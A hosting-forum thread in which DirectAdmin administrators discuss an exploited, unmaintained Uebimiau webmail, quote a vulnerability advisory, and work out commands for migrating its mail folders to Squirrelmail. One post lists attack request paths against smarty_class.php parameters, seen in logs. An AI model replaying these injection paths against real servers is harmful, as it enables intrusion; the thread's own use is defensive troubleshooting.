fixed the problem

chmod 000 /var/www/html/webmail

My website was exploited due to a direct admin, webmail program being installed

That is not very likely. Do you have any proof of this? Any evidence?

ryan1918,

The other webmail program is Uebimiau.

Do you have the most recent version installed?

Jeff

jlasman, uebimiau is an outdated application, so it's possible that there are some not fixed security holes (I saw ~3, but not critical).

Is it no longer being worked on? If not, then maybe we will have to warn people to migrate off it.

Does anyone have a script to move uebimiau email folders to imap folders? We may need that.

Jeff

It's not updated for ~2 years.. Their page isn't working properly, you can't contact admins, email authors etc. Few guys are working on a webmail based on UebiMiau - telaen.org. But I don't think it's a good webmail program at all :)

Thanks for the update on it. I'm going to start thinking about ending support on our systems for uebimiau by the end of this year.

Jeff

Thanks for the update on it. I'm going to start thinking about ending support on our systems for uebimiau by the end of this year.

Jeff

Jeff can you tell me how to SSH to the html file that contains the link to it, so I can kill it?... ;)

Cheers

I was exploited due to this webmail program or so it seems..

/webmail/smarty/smarty_class.php?_smarty_compile_path= shell
/webmail/smarty/smarty_class.php?filename= shell
/webmail/smarty/smarty_class.php?smarty_dir= shell

If Uebimiau is no longer being updated and full of security holes with the ability to exploit why on earth is DA still installing it on new installations? Surely, unsupported applications should no longer be installed and we should be given the opportunity to remove it from our boxes if we please.

Instead, another application should be installed to replace it Uebimiau on new and existing installations.

Well, I guess I got them going now, maybe they will think about removing or showing us how to remove these programs that are WAY outdated or not even being used anymore. I mean why have outdated program that risks a servers security, stop being lazy remove it from the package, and show everyone how to remove it.

I don't think all these people will like being exploited

Removing it wouldnt be difficult but replacing it with something else should be an option. You can remove the option from httpd.conf but then you have a dead webmail link. Maybe Roundcube should be linked up HINT!

Guess they don't think it's a big issue.

Maybe they dont but then again many others dont either otherwise thie thread would be teaming with replies. Oh well, the next few who get hacked may start WWIII. I know, we have already removed it from boxes. When a use clicks on the link instead of it loading the webmail pgm it loads an information screen that tells all that we have removed it for security reasons. Maybe othes should do the same thing.

If we install RC you can simply modify httpd.conf to load webmail which goes to the RC login.

Removing it wouldnt be difficult but replacing it with something else should be an option. You can remove the option from httpd.conf but then you have a dead webmail link. Maybe Roundcube should be linked up HINT!

There are already instructions on how to insert another webmail program for the webmail link in the knowledgebase.

The problem you get when you remove Uebimiau is that people who are using it will use all their stored email, because Uebimiau uses it's own proprietary method for storing mail folders.

The reason Uebimiau was originally chosen for DirectAdmin is that early DA releases didn't have IMAP; they only had POP3 email, and Uebimiau was the best webmail program that worked with POP3.

So it can't just be arbitrarily deleted.

Jeff

But in todays day and age as far as control panels is concerned IMAP is standard so there should be no reason to have a POP3 style webmail program. I dont know when IMAP became a standard with DA since i wasnt using DA back then, but really, this should be upgraded and archived and replaced. Neomail, Squirrelmail are default installations on every control panel i have used. It should be given some though by the developers to replace it.

But in todays day and age as far as control panels is concerned IMAP is standard so there should be no reason to have a POP3 style webmail program. I dont know when IMAP became a standard with DA since i wasnt using DA back then, but really, this should be upgraded and archived and replaced. Neomail, Squirrelmail are default installations on every control panel i have used. It should be given some though by the developers to replace it.

Jeff has a good point....there are folks that are using it. Perhaps we should try to reach agreement on a replacment program that could live as webmail, and then instructions could be developed on how to either remove the current webmail, or have it accessable in another way.

The advantage to this approach is that the current uebimiau users aren't sacraficed, and we could have two currently supported webmails.

Thom

Jeff has a good point....there are folks that are using it.

Yes but why would you want to keep using something that is no longer supported and could be compromised ?

Yes but why would you want to keep using something that is no longer supported and could be compromised ?

Oh, one reson might be to allow the current users of the "bad" webmail to transition to the new, improved, and sanctioned one.

I find it easier to attrack flies with honey, although one can do it with vinegar, it's just a tad bit harder.

Thom

If something is explotable on our boxes we dont want to run it and i think many feel the same way. In that case, our users dont have any say in the matter. Its called security and 9 times out of 10 users will appreciate that fact that you are security savvy and care enough to protect them and your own servers. While we dont know the extent of the full attack possible via this email script because we have not been given all that much detail on the extent of the hack, it sure dont want to put my boxes at risk of getting hacked at the user level and worst yet, at the server level.

And just for the record;

UebiMiau HTML Email HTML Injection Vulnerability

UebiMiau is prone to an HTML-injection vulnerability. This issue is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

This issue affects version 2.7.9; other versions may also be vulnerable

Here is more;
http://www.securityspace.com/smysecure/catid.html?id=16279

And just to let you know, DA runs 2.7.10 and its also vuln.

If something is explotable on our boxes we dont want to run it and i think many feel the same way. In that case, our users dont have any say in the matter. Its called security and 9 times out of 10 users will appreciate that fact that you are security savvy and care enough to protect them and your own servers. While we dont know the extent of the full attack possible via this email script because we have not been given all that much detail on the extent of the hack, it sure dont want to put my boxes at risk of getting hacked at the user level and worst yet, at the server level.

OK..l, I give up....I didn't say that it never should be replaced, I simply agreed with Jeff that one needs to consider dumping the webmail client that is used by many.

I'm surprized that DA would continue to install an unsupported product...even to the extent that it's assigned to the webmail slot, while one that seems to be supported(squirrelmail) is in not in the generic position.

Since I'm new to DA, I had to tell my users that theirdomain.com/webmail on the new server was not the same program as theirdomain.com/webmail on the old server.

Thanks you your lecture on security.

Thom

Your very welcome.

Yes but why would you want to keep using something that is no longer supported and could be compromised ?
Because my users won't like it if their email just disappears.

And in fact, they may even consider me liable. I neither want unhappy clients nor lawsuits.

Do you?

Jeff

Couldn't we just migrate the UebiMiau mail to Squirrelmail? Doesn't seem like it would be that hard.

Couldn't we just migrate the UebiMiau mail to Squirrelmail? Doesn't seem like it would be that hard.

That makes a lot of sense....and if it's done with warning, and some demo screen of squirrelmail, the transition for the users should be trouble-free.

I would think that DA might want to develop/find/offer a way to do it, and thus they would no longer be installing abandonware.

Thom

I don't think its hard to do. All the mail for the user's folders for UebiMiau is stored in /var/www/html/webmail/tmp/loginname_localhost/foldername

UebiMiau uses actual folders to store the .eml files. Squirrelmail uses a single file named what they call folders. All you would need to do for each folder is copy all of the .eml files inside a given folder for UebiMiau to the corresponding file for for Sqirrelmail.

For instance I set up a UebiMiau account and created a folder called Test. Sent myself an email and then copied that email to the folder Test. I then logged in through SSH and appended the contents of the .eml file to the file Test in my home directory which Squirrelmail uses.

I ran this command and it copied all the UebiMiau mail that was in the folder Test to the Squirrelmail folder Test:


cat /var/www/html/webmail/tmp/floyd_localhost/Test/* >> /home/floyd/mail/Test

So we would just need to expand on that and do it for every folder for every login name.

Floyd, your post confused me a bit so I did a bit of checking...

I actually logged on to the system hosting nobaloney.net and used an existing mailuser name (which I've renamed to xxx for the purpose of this discussion.

My system uses Maildir; if you use mbox, your experience may vary, but if you're updating from Uebimiau to Squirrelmail you should probaby update to Maildir at the same time anyway.

Note that this still needs a lot more testing before anyone expects it to work without error; that's why I'm NOT creating it as a HowTo.

First, I found the mailusername xxx had a subdirectory at:

/var/www/html/webmail/tmp/xxx_nobaloney.net_localhost/

In that subdirectory I found the following:

[root@da12 xxx_nobaloney.net_localhost]# ls -al
total 40
drwx------ 8 apache apache 4096 Jul 24 2006 .
drwx------ 147 apache apache 12288 Apr 23 09:57 ..
drwx------ 2 apache apache 4096 Jul 24 2006 _attachments
drwx------ 2 apache apache 4096 May 17 11:03 inbox
drwx------ 2 apache apache 4096 Jul 24 2006 _infos
drwx------ 2 apache apache 4096 May 17 11:07 saved-email
drwx------ 2 apache apache 4096 Jul 24 2006 sent
drwx------ 2 apache apache 4096 Jul 24 2006 trash
[root@da12 xxx_nobaloney.net_localhost]#

The contents of _attachments and _infos could conceivably create a problem, especially for attachments; you might want to do some testing to figure out how to move attachments because attachments in the _attachments directory will certainly not be available for Squirrelmail using IMAP. the _infos directory simply hold the preferences, which will probably be useless in the Squirrelmail environment; don't forget to tell your users to create new preferences in Squirrelmail.

The inbox directory was empty. I don't even know why it exists, or what it's for, since at least in the DirectAdmin implementation, Uebimiau keeps incoming email in the original inbox set up by the system.

The sent directory was also empty, because this particular user doesn't save a copy of sent email. If your users do, you'll have to move the directory contents.

The trash directory was also empty. If I were going to do the conversion I'd (after giving my clients warning) not bother to move the trash directory, which would have the effect of deleting it.

That leaves saved_email, which in the case of this user is a Uebimiau folder which needs to be moved.

Next thing to do is remove the index cache from your IMAP message store for the same mailusername; it'll be rebuilt by IMAP automatically as needed.

# cd /home/nobaloney/imap/nobaloney.net/xxx/Maildir/
# rm -Rf dovecot*
If the IMAP folder of the same name as the Uebimiau folder doesn't exist create it, with a . prefix as follows:

# mkdir .saved-email
# chmod 770 .saved-email
# chown nobalone:mail .saved_email
Now create the file structure for the new mail folder:

# cd .saved-email
# mkdir cur new tmp
# chmod 770 cur new tmp
# chown nobaloney:mail cur new tmp
Now move the contents of the Uebimiau folder to the new folder you've just created:

# mv /var/www/html/webmail/tmp/xxx_nobaloney.net_localhost/saved_email/* new/
Then add the new folder name to the subscriptions file. Edit the file at (in my case) /home/nobaloney/imap/nobaloney.net/xxx/Maildir/subscriptions, and add the new folder name on a line of it's own. Do not use a leading . character.
Now the Squirrelmail should work.

But TEST, TEST, TEST. I make no guarantees and I could have easily left something out :( .

Once you know this works, we'll move further; maybe have someone write a script.

Jeff

Yes but why would you want to keep using something that is no longer supported and could be compromised ?

bumping this up... A couple of on/off check box's would solve this prob.

Unless somebody is going to be switching back and forth a lot I don't see why this needs to be part of any control panel, DA or otherwise. Its a one time configuration unless something new comes along. A server admin can handle this configuration in a couple of minutes. A control panel is for stuff that needs to be taken care of frequently not once a year.

A control panel is for stuff that needs to be taken care of frequently not once a year.

A control panel is for stuff that the administrator, or reseller or end user does not want to, can not do, or chooses not to do.

Unlike Lake WoeBeGone, where the women are all strong, the men good looking and the children are all above average, users of the control panel vary in their abilities.

Well I guess this is starting to be a philosophical debate so this may be my last post on this.

We were talking about and I was referring to the changing of the webmail link. This is something only an admin would be able to do not resellers or users.

A control panel is primarily for users and resellers. A control panel can assist an admin but if an admin absolutely has to have a control panel then he is not an admin. If a control panel can do something that an admin cannot do then he should probably think twice about being an admin just yet. He should probably spend a few weeks learning to be an admin or hire one. Its not that hard to learn do the basics. And it pays off in the long run.

Since we were talking about changing the webmail link out of curiosity I decided to time how long it would take me. From time I open my ssh client to the time I exited out it was 50 seconds. I logged in, edited the httpd.conf file, restarted httpd and exited out of ssh all in 50 seconds. I seriously doubt a control panel can do it much faster than that. Changing the link in the skin would take a little longer but not much.

There may be other things a control panel would be faster at than what I could do myself but this topic was about changing the webmail link so that is what I was commenting on. I just spent 50 seconds on something that I will not have to change in the foreseeable future. I just cannot justify asking DA to add something that is just going to save me a few seconds over the course of years. I would rather them spend some time on stuff that will help my customers rather than something that will help me. I can take care of the server myself.

A control panel is primarily for users and resellers. A control panel can assist an admin but if an admin absolutely has to have a control panel then he is not an admin. If a control panel can do something that an admin cannot do then he should probably think twice about being an admin just yet.


And thank you for your philosophy...I don't recall ever seeing as a written rule. Based on your logic, why even have a Control Panel for the admin? After all, he/she doesn't need one.




I would rather them spend some time on stuff that will help my customers rather than something that will help me.

As I recall, when the thread started a few of us pointed out that the admin should be able to set the available web mail and defaults as a way of helping their customers....

I have to agree with tlchost, I am new to this admin thing. I didn't really want it, but in the past I've had trouble with responsiveness of my providers. This way when it needs to be done I can just do it. I am reading threads and such to learn about this product.

I may not be the best admin, but I learn from others, and a control panel feature is far less intimidating then having to work in root. To be honest, root scares me. I just know I'll hose it by some sort of typo, or a lack of understanding about something. In The control panel I can just read the help file, check a box, uncheck the box, etc. Much less permenant. Beside that, in root I might leave a bunch of trash around, not realizing it.

Based on your logic, why even have a Control Panel for the admin? After all, he/she doesn't need one.

You are correct. I never use the admin level of DA.

root scares me.

As it should. But driving a car can have much more permanent ramifications but that doesn't prevent you from driving one. It makes us think about what we are doing. When we first learn to drive a car most of us don't take it out on the public road first thing. We first practice where nobody will get hurt. We need to do the same thing with a server. Get a cheap old used computer and install linux on it and install everything else you will need and practice on it. When you want to do something on your production server do it on your test server first.

Actually, I've just setup a test box, and planned already to practice on that. I have already enlisted a couple friends who are far pro profiecient with root to verify that things I plan to do are relatively safe. Kinda like a sanity check before I do something really dumb.

My point is, while many of you don't need a control panel, for those of us who have to manage this stuff with little or no experience in 'nux, can get alot more done far more safely with a tool like DA. In fact, I like DA much better then plesk and c-panel. I like that it doesn't take forever to load, and that most important stuff is already built in. From what I have read so far, it looks like the developers of the DA take this forum seriously, and things that can be placed in DA ofter are if a need presents itself.

To say that "A control panel can assist an admin but if an admin absolutely has to have a control panel then he is not an admin. If a control panel can do something that an admin cannot do then he should probably think twice about being an admin just yet" I think is overly harsh. That was all I was trying to say. There are many reasons an admin might need a cp. Everybody isn't in the same boat as it were.

My point is just a warning to new admins out there. If you become dependent on a control panel to do your work for you then you are just asking for trouble.

It seems that there are a lot of people out there learning things in reverse. You should first become a decent admin and then use the control panel to assist you.

You can even use the control panel to help you learn as long as when you use it you go check to see what it did.

When you learn how things work then when a control panel doesn't do something the way you want it to then you can always going and change it yourself instead of begging the writers of the control panel to integrate it.

This has gotten way off topic now so if anybody wants to continue this discussion we should probably make a new thread for it.

New to forums protocol also, sorry.

If I wanted to continue this train of thought, but in a new thread how would I?

From the main page http://www.directadmin.com/forum/index.php click the main subject you think a new thread goes in and then click New Thread.